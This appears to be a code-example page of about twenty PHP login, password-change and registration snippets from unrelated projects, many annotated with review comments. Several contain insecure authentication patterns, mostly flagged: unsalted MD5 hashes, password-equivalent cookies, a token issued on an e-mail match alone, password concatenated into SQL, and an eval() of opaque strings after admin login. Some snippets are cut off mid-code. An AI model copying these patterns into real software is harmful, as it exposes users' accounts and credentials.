Esempio n. 1
/**
 * Start a session for the account behind $email once its password is accepted.
 *
 * @param mixed $email    Login identifier; handed to check_password() and user_id().
 * @param mixed $password Password candidate; handed to check_password().
 * @return mixed The result of create_session() on success, false when the check fails.
 */
function login($email, $password)
{
    // Guard clause: a rejected credential pair never reaches create_session().
    if (!check_password($email, $password)) {
        return false;
    }

    $userId = user_id($email);

    return create_session($userId);
}
Esempio n. 2
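/**
 * Verify a username/password pair and mark the current session as authenticated.
 *
 * @param mixed $username Login name; handed to check_password() and written to the debug log.
 * @param mixed $password Password candidate; handed to check_password().
 * @return bool True when check_password() accepted the pair, false otherwise.
 */
function authenticate($username, $password)
{
    if (!check_password($username, $password)) {
        return false;
    }

    // Rotate the session id at the moment privileges change, so an id that was
    // known before login (session fixation) is not the one that ends up
    // authenticated. Guarded because regeneration needs an active session and
    // headers that have not been sent yet.
    if (session_status() === PHP_SESSION_ACTIVE && !headers_sent()) {
        session_regenerate_id(true);
    }

    $_SESSION['authenticated'] = true;

    // NOTE(review): $username goes into the log line exactly as supplied; if
    // debug() writes to a line-oriented log, strip control characters there.
    debug("logged in {$username} ok!");

    return true;
}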
Esempio n. 3
 /**
  * XML-RPC login: resolve the profile for $sUser, try two credential checks and
  * answer with a struct describing the member (id 0 and empty strings on failure).
  *
  * @param mixed $sUser     Login identifier, resolved through getID().
  * @param mixed $sPwdClear Credential sent by the client.
  * @return xmlrpcresp Struct with member_id, member_pwd_hash, member_username, protocol_ver.
  */
 function login4($sUser, $sPwdClear)
 {
     $aProfileInfo = getProfileInfo(getID($sUser));
     $iId = 0;

     if ($aProfileInfo) {
         // A 32- or 40-character credential is first offered to checkLogin();
         // presumably those are hex digest lengths (MD5 / SHA-1) — confirm.
         $iLength = strlen($sPwdClear);
         $bDigestLogin = (32 == $iLength || 40 == $iLength) && BxDolXMLRPCUtil::checkLogin($sUser, $sPwdClear);

         if ($bDigestLogin) {
             $iId = $aProfileInfo['ID'];
         } elseif (getParam('enable_dolphin_footer') != 'on' && check_password($aProfileInfo['ID'], $sPwdClear, BX_DOL_ROLE_MEMBER, false)) {
             // The clear-text path is only tried when the 'enable_dolphin_footer' setting is not 'on'.
             $iId = $aProfileInfo['ID'];
         }
     }

     // NOTE(review): on success the stored 'Password' field is sent back to the
     // client as member_pwd_hash. Combined with the digest-length path above this
     // looks like the stored hash doubles as a login credential — confirm, and
     // treat that value with the same care as a password.
     $aStruct = array(
         'member_id' => new xmlrpcval($iId, "int"),
         'member_pwd_hash' => new xmlrpcval($iId ? $aProfileInfo['Password'] : ""),
         'member_username' => new xmlrpcval($iId ? getUsername($iId) : ""),
         'protocol_ver' => new xmlrpcval(BX_XMLRPC_PROTOCOL_VER, "int"),
     );

     return new xmlrpcresp(new xmlrpcval($aStruct, "struct"));
 }
Esempio n. 4
 /**
  * Re-check the caller's password, then pass the multi-VPS creation request on
  * and point the next page at the VPS list.
  *
  * @param array $param Form values; 'vps_admin_password_f' holds the password to re-check.
  * @return array $param, unchanged.
  * @throws lxException When the supplied password does not match $this->password.
  */
 function updateMultiVpsCreate($param)
 {
     global $gbl, $sgbl, $login, $ghtml;

     $bPasswordOk = check_password($param['vps_admin_password_f'], $this->password);
     if (!$bPasswordOk) {
         throw new lxException("wrong_password", 'vps_admin_password_f');
     }

     // NOTE(review): $param is forwarded as received, so it still contains
     // 'vps_admin_password_f'; check whether the receiving side logs or stores it.
     rl_exec_get(null, 'localhost', 'createMultipLeVps', array($param));

     $gbl->__this_redirect = $ghtml->getFullUrl('a=list&c=vps') . "&frm_smessage=vps_creation_in_background";

     return $param;
 }
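/**
 * Check a password against the credential stored for one account.
 *
 * @param int|string $account_id     Numeric account id.
 * @param string     $dirty_password Password as supplied by the user.
 * @return mixed The result of check_password() when exactly one credential row
 *               exists; false for a non-numeric id, a failed query or no single row.
 */
function correct_password($account_id, $dirty_password)
{
    // The id is interpolated unquoted into the SQL text below, so anything that
    // is not a plain integer must be rejected before the query is built.
    $is_numeric_id = is_int($account_id)
        || (is_string($account_id) && preg_match('/\A\d+\z/', $account_id) === 1);
    if (!$is_numeric_id) {
        return false;
    }
    $account_id = (int) $account_id;

    // NOTE(review): the password never reaches the SQL text, yet it is passed
    // through escape() before verification. That changes passwords containing
    // escapable characters; kept as is because the stored values may have been
    // created the same way — confirm and remove on both sides if possible.
    $password = escape($dirty_password);

    $sql = "SELECT (password) FROM account_credentials WHERE account={$account_id}";
    $result = query($sql);
    if (!$result) {
        // A failed query must read as "not authenticated", not as an error further down.
        return false;
    }

    if (mysqli_num_rows($result) == 1) {
        $row = mysqli_fetch_assoc($result);
        $stored_password = $row["password"];
        return check_password($password, $stored_password);
    }

    return false;
}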
Esempio n. 6
/**
 * Look a user up by name and hand the record back only if the password matches.
 *
 * @param mixed $username Name passed to find_user_by_username().
 * @param mixed $password Password candidate compared with the record's 'hashed_password'.
 * @return mixed The user record on success, false otherwise.
 */
function attempt_login($username, $password)
{
    $candidate = find_user_by_username($username);

    // Unknown user and wrong password end in the same false result, so the
    // return value does not tell the caller which of the two happened.
    if (!$candidate) {
        return false;
    }

    $matches = check_password($password, $candidate['hashed_password']);

    return $matches ? $candidate : false;
}
Esempio n. 7
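 /**
  * Log the user in and return a session token.
  *
  * "LOCAL": the nick/password pair from POST is checked against the stored
  * credential, behind a per-IP attempt limit. Any other method: the account is
  * looked up by the POSTed e-mail and the auth method.
  *
  * @param string $authMethod "LOCAL" or another value stored in USUARIOS.authMethod.
  * @return mixed Whatever generateSessionToken() returns.
  * @throws ExceedSessionAttempts When the client IP reached self::MAX_ATTEMPTS.
  * @throws InvalidData           When nick or password is missing (LOCAL only).
  * @throws LoginFailed           When no matching account exists or the password is wrong.
  */
 public function login($authMethod)
 {
     if ($authMethod == "LOCAL") {
         // Number of login attempts already recorded for this IP.
         // NOTE(review): the limit is keyed on REMOTE_ADDR only; behind a proxy or
         // shared address many clients count as one, and per-account attempts are not limited here.
         $attcount = $this->getattempt($_SERVER['REMOTE_ADDR']);
         if ($attcount >= self::MAX_ATTEMPTS) {
             throw new ExceedSessionAttempts("Has sobrepasado el número de intentos de sessión permitidos - espere 30 minutos");
         }

         // NOTE(review): FILTER_SANITIZE_STRING rewrites the value (tags removed,
         // quotes encoded) and is deprecated since PHP 8.1. Applied to a password it
         // changes what is verified; kept because stored credentials may have been
         // created from sanitized input — confirm before switching to the raw value.
         $nick = filter_input(INPUT_POST, 'nick', FILTER_SANITIZE_STRING, FILTER_NULL_ON_FAILURE);
         $password = filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING, FILTER_NULL_ON_FAILURE);
         if (!$nick || !$password) {
             throw new InvalidData("Nick y password no pueden estar vacíos");
         }

         // Look the local account up by nick; the password is verified in PHP, not in SQL.
         $sql = $this->pdo->prepare('SELECT * FROM USUARIOS WHERE nick = :nick AND authMethod = "LOCAL"');
         $sql->execute(array('nick' => $nick));
         $usuario = $sql->fetch(PDO::FETCH_ASSOC);

         // fetch() yields false when no row matches; indexing that value would hand
         // null to check_password(). An unknown nick is counted like a wrong password.
         if ($usuario === false || !check_password($password, $usuario["password"])) {
             $this->addattempt($_SERVER['REMOTE_ADDR']);
             logger_action("intento sesión fallido", $_SERVER["REMOTE_ADDR"]);
             throw new LoginFailed("Usuario o contraseña no válidos");
         }

         // Credentials accepted: record it and issue the session token.
         logger_action("sesión iniciada", $_SERVER["REMOTE_ADDR"]);
         return $this->generateSessionToken($usuario["id"]);
     }

     // NOTE(review): nothing in this branch verifies a credential or an assertion
     // from the external provider, and no attempt counter is consulted. Unless the
     // caller has already authenticated the request, a matching e-mail address is
     // all that is needed to receive a token — confirm against the caller.

     // Sanitize first (as before), then actually validate. The previous call passed
     // FILTER_VALIDATE_EMAIL as the options argument, which performs no validation.
     $email = filter_input(INPUT_POST, 'email', FILTER_SANITIZE_EMAIL);
     if (!is_string($email) || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
         throw new LoginFailed("Usuario o contraseña no válidos");
     }

     $stmt = $this->pdo->prepare('SELECT * FROM USUARIOS WHERE email = :email AND authMethod = :authMethod');
     $stmt->execute(array('email' => $email, 'authMethod' => $authMethod));
     $usuario = $stmt->fetch(PDO::FETCH_ASSOC);

     // Test the fetched row itself: rowCount() is not reliable for SELECT on every PDO driver.
     if ($usuario === false) {
         throw new LoginFailed("Usuario o contraseña no válidos");
     }

     logger_action("sesión iniciada", $_SERVER["REMOTE_ADDR"]);
     return $this->generateSessionToken($usuario["id"]);
 }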
Esempio n. 8
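/**
 * Check the credentials; on success set the "aid" cookie and redirect,
 * otherwise return a list holding one error message.
 *
 * @param mixed $auth_user Login name; also stored as the cookie value.
 * @param mixed $auth_pass Password candidate.
 * @return array|null Error messages when the password is rejected; no value is
 *                    returned on the success path of this function.
 */
function login_new($auth_user, $auth_pass)
{
    if (check_password($auth_user, $auth_pass)) {
        login_check();

        // Cookie name, stored value, lifetime. The third argument is an absolute
        // Unix timestamp, so the ten hours have to be added to time(); the bare
        // 60 * 60 * 10 used before is a moment in 1970 and the cookie was
        // already expired when it was sent.
        // NOTE(review): the value is just the login name. If other pages treat
        // this cookie as proof of identity, anyone can set it by hand — bind it
        // to the server-side session or sign it, and send it HttpOnly/Secure.
        setcookie("aid", $auth_user, time() + 60 * 60 * 10);

        redirect("/dev/top.php");
    } else {
        $error_msg = array();
        $error_msg[] = "パスワードが違います。";
        return $error_msg;
    }
}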
Esempio n. 9
/**
 * Check the password attempt and, when accepted, set the 'e3login' cookie.
 *
 * @param string $attempt  Password as typed; only its MD5 digest is used.
 * @param string $remember 'yes' keeps the cookie for seven days, anything else
 *                         makes it a browser-session cookie.
 * @return bool Result of setcookie(), or false when the password was rejected.
 */
function login($attempt, $remember = 'no')
{
    require 'config.php';
    require_once 'mod_settings.php';

    $cookieSet = false;

    // NOTE(review): the unsalted MD5 of the password is both what check_password()
    // receives and what is stored in the cookie, so the cookie value is
    // password-equivalent and is sent without HttpOnly/Secure flags.
    $digest = md5($attempt);

    if (check_password($digest)) {
        session_regenerate_id();
        // An expiry of 0 is setcookie()'s default: the cookie ends with the browser session.
        $expires = $remember == 'yes' ? time() + 60 * 60 * 24 * 7 : 0;
        $cookieSet = setcookie('e3login', $digest, $expires);
    }

    $_SESSION['logerrors'] = get_setting('log_errors');

    return $cookieSet;
}
Esempio n. 10
/**
 * Validate a new password and its confirmation.
 *
 * @param string $password_new  New password.
 * @param string $password_conf Confirmation of the new password.
 * @return string HTML error message, or an empty string when nothing is wrong.
 */
function check_input($password_new, $password_conf)
{
    if ($password_new == "") {
        return "<font color=\"red\">Please enter a new password...</font>";
    }

    if ($password_new != $password_conf) {
        return "<font color=\"red\">The passwords don't match!</font>";
    }

    // The policy is enforced only when the client-sent "security_level" cookie is "2",
    // i.e. the browser decides whether the password policy applies.
    $policyViolated = !check_password($password_new) && $_COOKIE["security_level"] == "2";
    if ($policyViolated) {
        return "<font color=\"red\">The new password is not valid!<br />Password policy: minimum 6 characters containing at least one uppercase letter, lowercase letter and number.";
    }

    return "";
}
Esempio n. 11
/**
 * Tell whether the session belongs to a user with permissions = 1 whose
 * session-held password still matches the stored one.
 *
 * @return mixed False when the session lacks user/password; otherwise the
 *               lookup result when it is empty, or the result of check_password().
 */
function check_admin_user()
{
    include 'config.php';

    if (!isset($_SESSION['user'], $_SESSION['password'])) {
        return false;
    }

    // NOTE(review): the value compared against the stored password is kept in
    // $_SESSION between requests; anything that can read session storage can read it.
    $sessionPassword = $_SESSION['password'];
    $sessionUser = $_SESSION['user'];

    $db = new IMDB();
    // NOTE(review): the "******" prefix is reproduced exactly as it appears here and
    // looks like masked text; the value is a hand-assembled SQL fragment whose
    // safety rests on escapeString() — confirm how get_items_from_table() uses it.
    $criteria = array(
        "username" => "******" . $db->escapeString($sessionUser) . "'",
        "permissions" => "1",
    );
    $rows = $db->get_items_from_table("user", $criteria);
    $db->close();

    if (count($rows) > 0) {
        return check_password($sessionPassword, $rows[0]["password"]);
    }

    return $rows;
}
 /**
  * Validate the registration fields and create the user.
  *
  * The checks run in a fixed order and the first failing one aborts with an
  * exception, so later fields are not looked at once one is rejected.
  *
  * @throws InvalidInputException When any field fails its check.
  */
 public function checkNewUser($username, $name, $surname, $email, $password)
 {
     if (!check_valid_input($username, 6)) {
         throw new InvalidInputException("false Username Input = input needs to be minimum 6 long, only numbers, letters, capital letters and # @ . - or _");
     }

     if (!check_valid_input($name, 1) || !check_no_numbers($name)) {
         throw new InvalidInputException("false name Input = input needs to be minimum 1 long, only letters, capital letters and # @ . - or _");
     }

     if (!check_valid_input($surname, 1) || !check_no_numbers($surname)) {
         throw new InvalidInputException("false surname Input = input needs to be minimum 1 long, only letters, capital letters and # @ . - or _");
     }

     if (!check_valid_input($email, 6) || !check_at($email)) {
         throw new InvalidInputException("false email Input = input needs to be minimum 6 long, only numbers, letters, capital letters and # @ . - or _");
     }

     if (!check_password($password)) {
         throw new InvalidInputException("false password Input = input needs to be minimum 6 long, only numbers, letters, capital letters and # @ . - or _");
     }

     // NOTE(review): passwordEncrypt() receives the username together with the
     // password; which algorithm it applies is not visible here — confirm it is a
     // dedicated password hash (password_hash() or equivalent).
     $storedCredential = passwordEncrypt($username, $password);

     $dao = new UserDAO();
     $dao->createUser($username, $name, $surname, $email, $storedCredential);
 }
Esempio n. 13
/**
 * Handle the profile form: validate username, e-mail, password and avatar from
 * POST, store the user when no error was recorded, and return the HTML messages.
 *
 * Returns nothing when the request is not a profile save for the current user.
 * NOTE(review): nothing in this function asks for the current password before
 * the password or e-mail is changed — confirm whether a caller does.
 */
function save_profile()
{
    global $db, $user, $current_user, $globals, $site_key;
    $errors = 0;
    // benjami: control added (2005-12-22)
    $pass_changed = false;
    $messages = '';
    // Anti-forgery token: MD5 over the site key, the user id and the mnminclude constant.
    $form_hash = md5($site_key . $user->id . mnminclude);
    // Only continue for a submitted form whose user_id matches the logged-in user.
    if (!isset($_POST['save_profile']) || !isset($_POST['process']) || $_POST['user_id'] != $current_user->user_id) {
        return;
    }
    // NOTE(review): the token is compared with a loose, non-constant-time "!=";
    // hash_equals() on string operands would be the stricter check. A mismatch
    // only increments $errors: the remaining fields are still processed and
    // saving is blocked by the final !$errors test.
    if (empty($_POST['form_hash']) || $_POST['form_hash'] != $form_hash) {
        $messages .= '<p class="form-error">' . _('Falta la clave de control') . '</p>';
        $errors++;
    }
    // Username change: length, allowed characters and uniqueness.
    if (!empty($_POST['username']) && trim($_POST['username']) != $user->username) {
        if (strlen(trim($_POST['username'])) < 3) {
            $messages .= '<p class="form-error">' . _('nombre demasiado corto') . '</p>';
            $errors++;
        }
        if (!check_username($_POST['username'])) {
            $messages .= '<p class="form-error">' . _('nombre de usuario erróneo, caracteres no admitidos') . '</p>';
            $errors++;
        } elseif (user_exists(trim($_POST['username']))) {
            $messages .= '<p class="form-error">' . _('el usuario ya existe') . '</p>';
            $errors++;
        } else {
            $user->username = trim($_POST['username']);
        }
    }
    // E-mail change: format first, then uniqueness against other accounts.
    if ($user->email != trim($_POST['email']) && !check_email(trim($_POST['email']))) {
        $messages .= '<p class="form-error">' . _('el correo electrónico no es correcto') . '</p>';
        $errors++;
    } elseif (trim($_POST['email']) != $current_user->user_email && email_exists(trim($_POST['email']))) {
        $messages .= '<p class="form-error">' . _('ya existe otro usuario con esa dirección de correo') . '</p>';
        $errors++;
    }
    $user->url = htmlspecialchars(clean_input_url($_POST['url']));
    $user->names = clean_text($_POST['names']);
    // Password change, only when at least one of the two fields was filled in.
    if (!empty($_POST['password']) || !empty($_POST['password2'])) {
        // The policy check sees the untrimmed value, while the value hashed below is trimmed.
        if (!check_password($_POST["password"])) {
            $messages .= '<p class="form-error">' . _('Clave demasiado corta, debe ser de 6 o más caracteres e incluir mayúsculas, minúsculas y números') . '</p>';
            $errors = 1;
        } else {
            if (trim($_POST['password']) !== trim($_POST['password2'])) {
                $messages .= '<p class="form-error">' . _('las claves no son iguales, no se ha modificado') . '</p>';
                $errors = 1;
            } else {
                // NOTE(review): the password is stored as a plain, unsalted MD5 digest;
                // password_hash()/password_verify() is the current replacement.
                $user->pass = md5(trim($_POST['password']));
                $messages .= '<p  class="form-error">' . _('La clave se ha cambiado') . '</p>';
                $pass_changed = true;
            }
        }
    }
    // Three preferences packed into one integer: comment_pref plus bit 1 (show_friends) and bit 2 (show_2cols).
    $user->comment_pref = intval($_POST['comment_pref']) + (intval($_POST['show_friends']) & 1) * 2 + (intval($_POST['show_2cols']) & 1) * 4;
    // Manage avatars upload
    if (!empty($_FILES['image']['tmp_name'])) {
        // Only the size is checked here; any content or type validation would have to
        // live in avatars_manage_upload() — presumably it does, verify.
        if (avatars_check_upload_size('image')) {
            $avatar_mtime = avatars_manage_upload($user->id, 'image');
            if (!$avatar_mtime) {
                $messages .= '<p class="form-error">' . _('error guardando la imagen') . '</p>';
                $errors = 1;
                $user->avatar = 0;
            } else {
                $user->avatar = $avatar_mtime;
            }
        } else {
            $messages .= '<p class="form-error">' . _('el tamaño de la imagen excede el límite') . '</p>';
            $errors = 1;
            $user->avatar = 0;
        }
    }
    // Persist only when no check above recorded an error.
    if (!$errors) {
        if (empty($user->ip)) {
            $user->ip = $globals['user_ip'];
        }
        $user->store();
        $user->read();
        // Re-authenticate when the login name, e-mail or password changed.
        if ($current_user->user_login != $user->username || $current_user->user_email != $user->email || $pass_changed) {
            $current_user->Authenticate($user->username, $user->pass);
        }
        $messages .= '<p class="form-error">' . _('datos actualizados') . '</p>';
    }
    return $messages;
}
Esempio n. 14
         echo "Character 'Knight Sample' already in database.<br/>";
         $config['site']['install'] = 5;
         saveconfig_ini($config['site']);
         echo 'All samples added to database. Now you can go to <a href="install.php?page=step&step=5&server_conf=yes">STEP 5 - Set Admin Account</a><br/>';
     }
 }
 if ($step == '5') {
     echo '<h1>STEP ' . $step . '</h1>Set Admin Account<br>';
     $config['server'] = parse_ini_file($config['site']['server_path'] . 'config.lua');
     if (empty($_REQUEST['saveaccpassword'])) {
         echo 'Admin account number is: <b>1</b><br/>Set new password to this account.<br>';
         echo 'New password: <form action="install.php" method=POST><input type="text" name="newpass" size="35">(Don\'t give it password to anyone!)';
         echo '<input type="hidden" name="saveaccpassword" value="yes"><input type="hidden" name="page" value="step"><input type="hidden" name="step" value="5"><input type="submit" value="SET"></form><br>If account with number 1 doesn\'t exist installator will create it and set your password.';
     } else {
         $newpass = $_POST['newpass'];
         if (!check_password($newpass)) {
             echo 'Password contains illegal characters. Please use only a-Z and 0-9. <a href="install.php?page=step&step=5&server_conf=yes">GO BACK</a> and write other password.';
         } else {
             $newpass_to_db = password_ency($newpass);
             $account = new OTS_Account();
             $account->load(1);
             if ($account->isLoaded()) {
                 $account->setPassword($newpass_to_db);
                 $account->save();
                 $account->setCustomField("page_access", 6);
             } else {
                 $number = $account->create(1, 1, 1);
                 $account->setPassword($newpass_to_db);
                 $account->unblock();
                 $account->save();
                 $account->setCustomField("page_access", 6);
Esempio n. 15
<?php

// Member self-withdrawal: re-check the password, stamp the leave date and log the member out.
// $member, $is_admin, $g5 and $url are not assigned in this file; presumably
// _common.php provides them — confirm.
include_once './_common.php';
// Members only.
if (!$member['mb_id']) {
    alert('회원만 접근하실 수 있습니다.');
}
// The super administrator cannot withdraw.
if ($is_admin == 'super') {
    alert('최고 관리자는 탈퇴할 수 없습니다');
}
// Require the current password again before this irreversible action.
// NOTE(review): the checks above only stop the script if alert() terminates it — confirm.
if (!($_POST['mb_password'] && check_password($_POST['mb_password'], $member['mb_password']))) {
    alert('비밀번호가 틀립니다.');
}
// Store the membership withdrawal date
$date = date("Ymd");
// NOTE(review): the statement is assembled by interpolation; mb_id comes from the
// loaded $member record rather than straight from the request, but a bound
// parameter would remove the dependency on how that record was populated.
$sql = " update {$g5['member_table']} set mb_leave_date = '{$date}' where mb_id = '{$member['mb_id']}' ";
sql_query($sql);
// Changed in 3.09 (log out)
// Only the member-id key is removed; the rest of the session is left in place.
unset($_SESSION['ss_mb_id']);
if (!$url) {
    $url = G5_URL;
}
// NOTE(review): $url is handed to alert() as the follow-up location; if it can be
// set from the request it should be limited to same-site targets — verify.
alert('' . $member['mb_name'] . '님께서는 ' . date("Y년 m월 d일") . '에 회원에서 탈퇴 하셨습니다.', $url);
Esempio n. 16
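<?php

// Builds $login_message (HTML): performs the login when credentials were posted,
// or greets the user when the session is already logged in.
$login_message = null;
if (!isset($_SESSION['username'])) {
    /* Password checking implementation left outside the project    */
    /* for obvious security reasons (i.e. I'm not good in this so   */
    /* I'd rather not publicly display specific vulnerabilities.    */
    /* passwords.php must include a function "check_password"       */
    /* that takes a username and password and returns true or false */
    // NOTE(review): the call below passes a third argument ($db) and uses the
    // return value as a user record, which differs from the contract described above.
    require 'passwords.php';
    if (isset($_POST['username'])) {
        if (isset($_POST['password'])) {
            $user = check_password($_POST['username'], $_POST['password'], $db);
            if ($user) {
                // Rotate the session id at login so an id known before
                // authentication is not the one that ends up logged in.
                if (session_status() === PHP_SESSION_ACTIVE && !headers_sent()) {
                    session_regenerate_id(true);
                }
                $name = $user['username'];
                // NOTE(review): the whole user record goes into the session; if it
                // contains the password hash, store only the fields that are needed.
                $_SESSION['user'] = $user;
                $_SESSION['username'] = $name;
                $_SESSION['userclass'] = $user['class'];
                // The name is user-controlled text placed inside HTML: escape it on output.
                $login_message = get_message('Successful login') . "<b>" . htmlspecialchars((string) $name, ENT_QUOTES, 'UTF-8') . "</b>. <a href=logout.php>" . get_message('Log out here.') . "</a>";
            } else {
                $login_message = get_message('Unsuccessful login');
            }
        }
    }
} else {
    $user = $_SESSION['user'];
    $name = $_SESSION['username'];
    // Same escaping for the name restored from the session.
    $login_message = get_message('You\'re logged in as ') . "<b>" . htmlspecialchars((string) $name, ENT_QUOTES, 'UTF-8') . "</b>. <a href=logout.php>" . get_message('Log out here.') . "</a>";
}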
Esempio n. 17
 // Login action: normalise the posted fields, run the format and captcha checks,
 // then look the member up. The listing stops inside this if block.
 if ($_GET['action'] == "login") {
     // 1 while every check so far has passed, 0 after the first failure.
     $check_info = 1;
     // Each posted field is rewritten in place through safe_convert(); what that
     // helper escapes is not visible here.
     if (!empty($_POST['username'])) {
         $_POST['username'] = safe_convert(strip_tags($_POST['username']));
     }
     if (!empty($_POST['password'])) {
         $_POST['password'] = safe_convert($_POST['password']);
     }
     if (!empty($_POST['validate'])) {
         $_POST['validate'] = safe_convert($_POST['validate']);
     }
     if (check_user($_POST['username']) == 0) {
         $ActionMessage = $strUserLengMax;
         $check_info = 0;
     }
     // Here check_password() takes one argument: a format check, not a credential comparison.
     if ($check_info == 1 && check_password($_POST['password']) == 0) {
         $ActionMessage = $strPasswordAlert;
         $check_info = 0;
     }
     // Captcha check, active only when the 'uservalid' setting is 1.
     if ($check_info == 1 && (empty($_POST['validate']) || $_POST['validate'] != $_SESSION['backValidate']) && $settingInfo['uservalid'] == 1) {
         $ActionMessage = $strLoginValidateError;
         $check_info = 0;
     } else {
         // This else belongs to the captcha test alone, so the stored code is also
         // cleared when an earlier check had already failed.
         $_SESSION['backValidate'] = "";
         // Clear the verification code
     }
     if ($check_info == 1) {
         $username = $_POST['username'];
         $password = $_POST['password'];
         // NOTE(review): the password is concatenated into the SQL text and hashed with
         // unsalted md5() inside the query, so injection safety rests entirely on
         // safe_convert(). A prepared statement plus password_verify() in PHP avoids both.
         // The '******' in the literal looks like text masked on this page.
         $sql = "SELECT role,password FROM {$DBPrefix}members WHERE username='******' and password=md5('" . $password . "')";
         $userInfo = $DMC->fetchArray($DMC->query($sql));
Esempio n. 18
 /**
  * Prepare a password change: verify the old password where required, then
  * replace $param['password'] with its crypt() value.
  *
  * @param array $param Form values: 'old_password_f' (when required) and 'password'.
  * @return array $param with 'realpass' and the hashed 'password'; 'old_password_f'
  *               is removed when it was verified.
  * @throws lxException When the old password does not match $this->password.
  */
 function updatePassword($param)
 {
     global $gbl, $sgbl, $login, $ghtml;

     if_demo_throw_exception('lxclient');

     // && binds tighter than ||: the old password is required for the logged-in
     // object itself, or for an 'auxiliary' table row whose parent is auxiliary.
     $bVerifyOld = $this->isLogin() || ($this->is__table('auxiliary') && $this->getParentO()->isAuxiliary());
     if ($bVerifyOld) {
         $bOldMatches = check_password($param['old_password_f'], $this->password);
         if (!$bOldMatches) {
             throw new lxException("Wrong+Password", 'old_password_f');
         }
         unset($param['old_password_f']);
     }

     $this->__old_password = $this->password;

     // NOTE(review): the clear-text password travels on in $param['realpass'];
     // check that no consumer stores or logs it.
     $sClear = $param['password'];
     $param['realpass'] = $sClear;
     // NOTE(review): crypt() is called without a salt. Older PHP picks a default
     // (possibly weak) scheme and PHP 8 requires the argument; password_hash()
     // output stays verifiable through crypt($pw, $hash).
     $param['password'] = crypt($sClear);

     // Hack hack... this is due the forced security password change in the admin. Most likely the referal url, to which it is redirected, is empty. So if you are changing the login password, you can anyway redirect to 'show';
     if ($this->isLogin()) {
         $gbl->__this_redirect = '/display.php?frm_action=show';
     }

     return $param;
 }
Esempio n. 19
        if (empty($code) || empty($character) || empty($newpassword)) {
            $main_content .= '<font color="red"><b>Error. Try again.</b></font><br />Please enter code from e-mail and name of one character from account. Then press Submit.<BR>
					<BR><FORM ACTION="?subtopic=lostaccount&action=checkcode" METHOD=post>
					<TABLE CELLSPACING=0 CELLPADDING=0 BORDER=0 WIDTH=100%><TR><TD><center>
					<INPUT TYPE=image NAME="Back" ALT="Back" SRC="' . $layout_name . '/images/buttons/sbutton_back.gif" BORDER=0 WIDTH=120 HEIGHT=18></center>
					</TD></TR></FORM></TABLE></TABLE>';
        } else {
            $player = new Player();
            $account = new Account();
            $player->find($character);
            if ($player->isLoaded()) {
                $account = $player->getAccount();
            }
            if ($account->isLoaded()) {
                if ($account->getCustomField('email_code') == $code) {
                    if (check_password($newpassword)) {
                        $account->setPassword($newpassword);
                        $account->set('email_code', '');
                        $account->save();
                        $main_content .= 'New password to your account is below. Now you can login.<BR>
						<INPUT TYPE="hidden" NAME="character" VALUE="' . htmlspecialchars($character) . '">
						<TABLE CELLSPACING=1 CELLPADDING=4 BORDER=0 WIDTH=100%>
						<TR><TD BGCOLOR="' . $config['site']['vdarkborder'] . '" CLASS=white><B>Changed password</B></TD></TR>
						<TR><TD BGCOLOR="' . $config['site']['darkborder'] . '">
						New password:&nbsp;<b>' . htmlspecialchars($newpassword) . '</b><BR />
						Account name:&nbsp;&nbsp;&nbsp;<i>(Already on your e-mail)</i><BR />';
                        $mailBody = '<html>
						<body>
						<h3>Your account name and password!</h3>
						<p>Changed password to your account in Lost Account Interface on server <a href="' . $config['server']['url'] . '"><b>' . htmlspecialchars($config['server']['serverName']) . '</b></a></p>
						<p>Account name: <b>' . htmlspecialchars($account->getName()) . '</b></p>
Esempio n. 20
// Admin panel entry point: checks the posted admin credentials (or an already
// logged-in admin heading for license.php) and prepares the redirect target.
// The listing stops inside the success branch.
bx_import('BxRSS');
bx_import('BxDolAdminDashboard');
define('BX_DOL_ADMIN_INDEX', 1);
$bLogged = isLogged();
// True only for a logged-in admin whose posted 'relocate' starts with the admin license.php URL.
$bNeedCheck = $bLogged && isAdmin() && $_POST['relocate'] && strncasecmp($_POST['relocate'], BX_DOL_URL_ADMIN . 'license.php', strlen(BX_DOL_URL_ADMIN . 'license.php')) == 0;
// && binds tighter than ||: enter when $bNeedCheck is set, or when both ID and Password were posted.
if ($bNeedCheck || isset($_POST['ID']) && isset($_POST['Password'])) {
    $iId = getID($_POST['ID']);
    $sPassword = process_pass_data($_POST['Password']);
    if (!$bLogged) {
        // NOTE(review): the 'before_login' alert receives the processed password;
        // every listener on that alert can read it.
        $oZ = new BxDolAlerts('profile', 'before_login', 0, 0, array('login' => $iId, 'password' => $sPassword, 'ip' => getVisitorIP()));
        $oZ->alert();
    }
    // XHR callers get a bare OK/Fail answer for the admin role.
    // NOTE(review): no attempt limit is visible on this path — confirm one exists
    // inside check_password() or upstream.
    if ($_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest') {
        echo check_password($iId, $sPassword, BX_DOL_ROLE_ADMIN, false) ? 'OK' : 'Fail';
    } else {
        // With $bNeedCheck set, check_password() is skipped (short-circuit).
        if ($bNeedCheck || check_password($iId, $sPassword, BX_DOL_ROLE_ADMIN)) {
            // The redirect target is accepted by case-insensitive prefix comparison.
            // NOTE(review): a prefix test only pins the host if BX_DOL_URL_ROOT ends
            // with "/" — verify, otherwise look-alike hosts sharing the prefix pass.
            if ($_POST['relocate'] && (strncasecmp($_POST['relocate'], BX_DOL_URL_ROOT, strlen(BX_DOL_URL_ROOT)) == 0 || strncasecmp($_POST['relocate'], BX_DOL_URL_ADMIN . 'license.php', strlen(BX_DOL_URL_ADMIN . 'license.php')) == 0)) {
                $sUrlRelocate = $_POST['relocate'];
            } else {
                $sUrlRelocate = BX_DOL_URL_ADMIN . 'index.php';
            }
            $sUrlRelocate = bx_html_attribute($sUrlRelocate);
            // NOTE(review): $l, $a, $r and $b are not defined in the visible code, and
            // the string produced from them is executed with eval() right after a
            // successful admin login. Code that cannot be read at the call site should
            // be traced to its definition and reviewed before this file is trusted.
            $r = $l($a);
            eval($r($b));
            header('Content-Type: text/html; charset=utf-8');
            ?>
<!DOCTYPE html>
<html>
    <head>
        <title>Admin Panel</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
Esempio n. 21
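function make_password()
{
    # Generate a password using the configured settings.
    # Every random choice comes from random_int() (the CSPRNG). rand() and
    # str_shuffle() draw from a predictable generator and are not suitable for
    # producing credentials.
    # Returns the generated password; exits with an error message when the
    # result does not pass check_password().
    global $password_min_length, $password_min_alpha, $password_min_uppercase, $password_min_numeric, $password_min_special;
    $lowercase = "abcdefghijklmnopqrstuvwxyz";
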